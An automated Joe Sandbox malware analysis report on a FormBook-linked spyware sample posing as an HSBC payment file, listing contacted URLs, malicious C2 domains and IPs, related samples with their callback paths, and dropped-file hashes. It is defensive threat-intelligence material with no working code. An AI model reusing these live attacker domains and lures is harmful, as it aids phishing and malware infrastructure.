                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.ecosia.org/newtab/sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.Crochetpets.onlinesdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.crochetpets.online/__media__/js/trademark.php?d=crochetpets.online&type=nssdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://ac.ecosia.org/autocomplete?q=sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://i4.cdn-image.com/__media__/js/min.js?v2.3sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.crochetpets.online/Crochet_Baby.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkcisdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.crochetpets.online/Crochet_Cotton.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqksdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldsdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.crochetpets.online/__media__/design/underconstructionnotice.php?d=crochetpets.onlinesdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              195.110.124.133
                                                                                                                              hentaistgma.netItaly
                                                                                                                              39729REGISTER-ASITtrue
                                                                                                                              54.67.87.110
                                                                                                                              www.ngmr.xyzUnited States
                                                                                                                              16509AMAZON-02UStrue
                                                                                                                              221.121.144.149
                                                                                                                              inf30027group23.xyzAustralia
                                                                                                                              45671AS45671-NET-AUWholesaleServicesProviderAUtrue
                                                                                                                              199.59.243.227
                                                                                                                              www.polarmuseum.infoUnited States
                                                                                                                              395082BODIS-NJUStrue
                                                                                                                              208.91.197.27
                                                                                                                              www.crochetpets.onlineVirgin Islands (BRITISH)
                                                                                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                              198.44.251.203
                                                                                                                              www.n0pme6.topUnited States
                                                                                                                              26484IKGUL-26484UStrue
                                                                                                                              81.2.196.19
                                                                                                                              kovallo.cloudCzech Republic
                                                                                                                              24806INTERNET-CZKtis238403KtisCZtrue
                                                                                                                              162.213.249.216
                                                                                                                              www.tophcom.onlineUnited States
                                                                                                                              22612NAMECHEAP-NETUStrue
                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1539076
                                                                                                                              Start date and time:2024-10-22 05:37:04 +02:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 9m 39s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Run name:Run with higher sleep bypass
                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:2
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:rHSBCBank_Paymentswiftcpy.exe
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@11/8
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 75%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 97%
                                                                                                                              • Number of executed functions: 48
                                                                                                                              • Number of non-executed functions: 277
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Execution Graph export aborted for target EqOUZfSIzU.exe, PID 5696 because it is empty
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              TimeTypeDescription
                                                                                                                              23:38:56API Interceptor7797989x Sleep call for process: sdchange.exe modified
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              195.110.124.133Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                              • www.nidedabeille.net/l6bs/
                                                                                                                              Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.bluegirls.blog/cejh/
                                                                                                                              3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.trisixnine.net/x0wm/
                                                                                                                              Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.bluegirls.blog/cejh/
                                                                                                                              RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.trisixnine.net/x0wm/
                                                                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.hentaistgma.net/8ouq/
                                                                                                                              rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • www.nidedabeille.net/qwre/
                                                                                                                              PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.hentaistgma.net/00ob/
                                                                                                                              rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.elettrosistemista.zip/fo8o/
                                                                                                                              BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.trisixnine.net/0057/
                                                                                                                              54.67.87.110jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.ngmr.xyz/qj8y/
                                                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.ngmr.xyz/txr6/
                                                                                                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • www.ngmr.xyz/txr6/
                                                                                                                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.teenageoverload.xyz/tk11/
                                                                                                                              DN.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.teenageoverload.xyz/tk11/
                                                                                                                              Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.teenageoverload.xyz/tk11/
                                                                                                                              ZRaWv2lX6l.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.3937981.xyz/enuj/
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              www.donante-de-ovulos.bizPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Payment.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.226
                                                                                                                              www.crochetpets.online3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 208.91.197.27
                                                                                                                              foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 208.91.197.27
                                                                                                                              RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 208.91.197.27
                                                                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 208.91.197.27
                                                                                                                              www.polarmuseum.infow64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              www.ngmr.xyzjeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 54.67.87.110
                                                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 54.67.87.110
                                                                                                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 54.67.87.110
                                                                                                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 54.67.87.110
                                                                                                                              www.tophcom.onlineseethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                              • 162.213.249.216
                                                                                                                              SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 162.213.249.216
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              AMAZON-02USla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 52.35.74.193
                                                                                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 18.145.226.37
                                                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 52.17.252.32
                                                                                                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 52.68.87.231
                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 34.219.162.229
                                                                                                                              bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 130.177.9.211
                                                                                                                              bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 52.69.222.3
                                                                                                                              https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                                                                                              • 3.126.222.51
                                                                                                                              http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                                                                                              • 3.160.150.86
                                                                                                                              bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 52.8.76.159
                                                                                                                              REGISTER-ASITRequest for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              http://evriservicescompany.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 81.88.58.193
                                                                                                                              Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 81.88.48.71
                                                                                                                              3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              AS45671-NET-AUWholesaleServicesProviderAUbin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 178.171.73.59
                                                                                                                              bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 203.132.130.8
                                                                                                                              ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 117.20.6.56
                                                                                                                              spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 202.60.94.183
                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 202.60.94.150
                                                                                                                              na.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                              • 202.60.94.15
                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 202.60.94.164
                                                                                                                              RFNnJGB7wy.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 168.80.10.52
                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 202.60.94.187
                                                                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 221.121.144.149
                                                                                                                              BODIS-NJUSHalkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 199.59.243.227
                                                                                                                              http://msnnss001.vastserve.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 199.59.243.205
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):196608
                                                                                                                              Entropy (8bit):1.1239949490932863
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                              MD5:271D5F995996735B01672CF227C81C17
                                                                                                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286720
                                                                                                                              Entropy (8bit):7.993922125731863
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:iCgyDiit+LDyQj6oqpm0+a8MpN1kG24txcftRTz7MyXJ5HaVOk7E+y:irWl+Dysd8OaTpN1W4kH7MyXJwk
                                                                                                                              MD5:EF0D90F7D8F6FAA12364932A07446E4A
                                                                                                                              SHA1:06BD3ECE9F18F41C88EF3F5E0AECB7E936F64E05
                                                                                                                              SHA-256:96B0D49BB44D540C77D8515AEE64E4BF3D1DE4CAD4C461BCDBCB23C1F16A32FF
                                                                                                                              SHA-512:263A141DF80290B0AAFB2838EA51A607539DF55C9837C0808B50F4973C44013FC0D83731A1127A932DAF15E1B796D6677CBDE567C8E293412C8B6D825662AF4D
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:x..a.4JD2...^.....Q0...l1M..2SXN5JQ384JD2E5FW2SXN5JQ384JD2.5FW<L.@5.X...K..da.>As(<Z-#RU.)%\+Z2wP6x<@$qZV...aeX)3W}UC?nQ384JD2<4O..3?..*6..T-.(.mR4.T...XS.^...z7U..'V"lS_.JD2E5FW2..N5.P28>.hE5FW2SXN.JS235AD2.1FW2SXN5JQ.)4JD"E5F76SXNuJQ#84JF2E3FW2SXN5LQ384JD2EUBW2QXN5JQ3:4..2E%FW"SXN5ZQ3(4JD2E5VW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JjF M2W2S,.1JQ#84J.6E5VW2SXN5JQ384JD2e5F72SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2
                                                                                                                              Process:C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286720
                                                                                                                              Entropy (8bit):7.993922125731863
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:iCgyDiit+LDyQj6oqpm0+a8MpN1kG24txcftRTz7MyXJ5HaVOk7E+y:irWl+Dysd8OaTpN1W4kH7MyXJwk
                                                                                                                              MD5:EF0D90F7D8F6FAA12364932A07446E4A
                                                                                                                              SHA1:06BD3ECE9F18F41C88EF3F5E0AECB7E936F64E05
                                                                                                                              SHA-256:96B0D49BB44D540C77D8515AEE64E4BF3D1DE4CAD4C461BCDBCB23C1F16A32FF
                                                                                                                              SHA-512:263A141DF80290B0AAFB2838EA51A607539DF55C9837C0808B50F4973C44013FC0D83731A1127A932DAF15E1B796D6677CBDE567C8E293412C8B6D825662AF4D
                                                                                                                              Malicious:false
